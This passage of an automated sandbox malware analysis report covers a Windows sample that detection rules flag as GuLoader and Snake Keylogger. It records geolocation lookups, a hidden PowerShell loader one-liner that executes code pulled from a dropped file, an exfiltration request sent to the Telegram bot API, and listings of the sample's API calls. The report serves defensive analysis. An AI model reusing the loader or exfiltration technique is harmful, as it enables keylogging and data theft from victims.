2025-01-10 16:09:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49993	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:22 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:09:22 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840151 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnAGcHvUQAIYEWgFhNZQ00QJL2YeTs0T%2F4BOqddYcvx0IgqTmY37Vysq94BeZekXBN3u4qDcq9FFEtFWAgcQMUsBYtpfZOs1s2C3bdBxKObsRTe170l75h9yl1abZxkHnQ5%2Fi4Pz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee5ccbb30f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1540&rtt_var=778&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1896103&cwnd=231&unsent_bytes=0&cid=82048bfbd1c411bc&ts=141&x=0"
2025-01-10 16:09:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.11	49995	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 16:09:25 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840154 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B8kvNnMoOkyqQYpqvJO3%2Fg33pPbbdjhxuxVq7G2ux4yP3xNxIkH940q8SYNG4gcWDhRzZFSgkmDGB7I3VeaqqUr0RQkLHrfmxWBNV6mydcE9N6N5VlkhVN316WyTDCN9kxcmTvti"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee6d39c58c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2142&min_rtt=2098&rtt_var=818&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1391801&cwnd=223&unsent_bytes=0&cid=6ef0086e3175af02&ts=158&x=0"
2025-01-10 16:09:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.11	49997	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 16:09:27 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840156 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0T2his%2FMoT4afBNvFmeRUIFJxBeFw1myFEXaHcq6PVDu7t3FXuc7JmUEQATr2JyRGrC%2BA%2B9LanvdfdOvnAJ7MBfU7EtW3P0xO0ntjauQaxbjDXBqaqrcN71V1jjt1d7cBOQLHYp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee7b3f5842d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1590&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1759036&cwnd=229&unsent_bytes=0&cid=85fae8c6305513b7&ts=163&x=0"
2025-01-10 16:09:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49999	104.21.80.1	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:28 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 16:09:28 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:09:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1840157 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=02NWWq6MdCi4EeHr3O0ElA7tEw6%2B0OjkrbO3aOU2wSuO5AKS5hbyUWvf2HRJXapKKb2nyl2RjiREx3tiNnw9YazCJoa2bL6R5stHCzImvI56Pu%2FwxrvbqzwQVotTPVHVUXd02rvs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdee82ea1642d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1674&rtt_var=660&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1744324&cwnd=229&unsent_bytes=0&cid=167ae2b3e6129341&ts=158&x=0"
2025-01-10 16:09:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	50000	149.154.167.220	443	1480	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 16:09:29 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2002:20:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 16:09:29 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 16:09:29 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 16:09:29 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	11:07:24
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\RmIYOfX0yO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RmIYOfX0yO.exe"
Imagebase:	0x400000
File size:	789'280 bytes
MD5 hash:	5E2FF1914FC1F8EBADF282F4096D6FC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:07:26
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Vulcanological=gc -raw 'C:\Users\user\AppData\Local\magmaet\clenched\Storvildtjagten180.Agg';$Accusor=$Vulcanological.SubString(74166,3);.$Accusor($Vulcanological) "
Imagebase:	0x880000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2191615306.000000000D623000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:07:26
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:08:52
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x7e0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2578808051.0000000025A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.4%
Total number of Nodes:	1357
Total number of Limit Nodes:	45

Executed Functions

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004033D8
GetVersion.KERNEL32 ref: 004033DE
#17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040342E
OleInitialize.OLE32(00000000), ref: 00403435
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403451
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 00403466
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000), ref: 00403479
CharNextW.USER32(00000000,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000020), ref: 004034A0

Part of subcall function 00406559: GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
Part of subcall function 00406559: GetProcAddress.KERNEL32(00000000,?), ref: 00406586

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035DB
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035EC
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F8
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040360C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403614
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403625
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040362D
DeleteFileW.KERNELBASE(1033), ref: 00403641

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

OleUninitialize.OLE32(?), ref: 0040370C
ExitProcess.KERNEL32 ref: 0040372E
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 00403741
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 00403750
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 0040375B
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RmIYOfX0yO.exe",00000000,?), ref: 00403767
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403783
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 004037DD
CopyFileW.KERNEL32(C:\Users\user\Desktop\RmIYOfX0yO.exe,00420F08,00000001), ref: 004037F1
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 0040381E
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040384D
OpenProcessToken.ADVAPI32(00000000), ref: 00403854
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403869
AdjustTokenPrivileges.ADVAPI32 ref: 0040388C
ExitWindowsEx.USER32(00000002,80040002), ref: 004038B1
ExitProcess.KERNEL32 ref: 004038D4

Strings

SeShutdownPrivilege, xrefs: 00403863
C:\Users\user\AppData\Local\Temp\, xrefs: 004035D0, 004035D5, 004035EB, 004035F7, 00403606, 00403613, 0040361F, 00403627, 0040373E, 0040374F, 0040375A, 00403766, 00403773, 00403782, 00403833
C:\Users\user\Desktop\RmIYOfX0yO.exe, xrefs: 004037EC
TMP, xrefs: 00403628
Low, xrefs: 0040360E
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 004035BE, 004036DE, 00403789, 00403793
C:\Users\user\Desktop, xrefs: 00403760, 00403765, 00403792
~nsu, xrefs: 00403739
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004033CC
.tmp, xrefs: 00403755
SETUPAPI, xrefs: 00403411
C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 004036E9
TEMP, xrefs: 00403620
USERENV, xrefs: 00403407
"C:\Users\user\Desktop\RmIYOfX0yO.exe", xrefs: 0040346C, 00403472, 00403669
1033, xrefs: 0040363C
NSIS Error, xrefs: 00403457
UXTHEME, xrefs: 004033FD
Error launching installer, xrefs: 004036C3
\Temp, xrefs: 004035F2

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
String ID: "C:\Users\user\Desktop\RmIYOfX0yO.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\AppData\Local\magmaet\clenched$C:\Users\user\Desktop$C:\Users\user\Desktop\RmIYOfX0yO.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
API String ID: 3586999533-1761608603
Opcode ID: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction ID: 382b60f40ca78a79eaa77c6fd6579f97e3273799caf5780a05f3f86dc88dff68
Opcode Fuzzy Hash: f3ecbdcc9d2ddf88f0db60c94208847800fabd89ade3af92fca17dc4b9b4c2fd
Instruction Fuzzy Hash: 1DD11771200300BBD7207F659D09A2B3EADEB4070AF15843FF885B62D2DB7D9956876E

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040547F
GetDlgItem.USER32(?,000003EE), ref: 0040548E
GetClientRect.USER32(?,?), ref: 004054CB
GetSystemMetrics.USER32(00000002), ref: 004054D2
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F3
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405504
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405517
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405525
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405538
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555A
ShowWindow.USER32(?,00000008), ref: 0040556E
GetDlgItem.USER32(?,000003EC), ref: 0040558F
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559F
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B8
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C4
GetDlgItem.USER32(?,000003F8), ref: 0040549D

Part of subcall function 0040427C: SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A

GetDlgItem.USER32(?,000003EC), ref: 004055E1
CreateThread.KERNELBASE(00000000,00000000,Function_000053B5,00000000), ref: 004055EF
CloseHandle.KERNELBASE(00000000), ref: 004055F6
ShowWindow.USER32(00000000), ref: 0040561A
ShowWindow.USER32(?,00000008), ref: 0040561F
ShowWindow.USER32(00000008), ref: 00405669
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040569D
CreatePopupMenu.USER32 ref: 004056AE
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C2
GetWindowRect.USER32(?,?), ref: 004056E2
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FB
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405733
OpenClipboard.USER32(00000000), ref: 00405743
EmptyClipboard.USER32 ref: 00405749
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405755
GlobalLock.KERNEL32(00000000), ref: 0040575F
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
GlobalUnlock.KERNEL32(00000000), ref: 00405793
SetClipboardData.USER32(0000000D,00000000), ref: 0040579E
CloseClipboard.USER32 ref: 004057A4

Strings

{, xrefs: 00405687
H7B, xrefs: 0040570F

Memory Dump Source

Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction ID: 2c7cb92300b087b9ae130e103e133312d6144c84674811722de124f1f1f34f09
Opcode Fuzzy Hash: 64a521bccca9f5caed772c9a5003e4b30c68140e3a7fe85c050ebaedb87b4aa9
Instruction Fuzzy Hash: 16B13770900608FFDF119F60DD899AE7B79FB08354F40847AFA45A62A0CB758E52DF68

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Completed,?,00405319,Completed,00000000,00000000,00000000), ref: 00406268
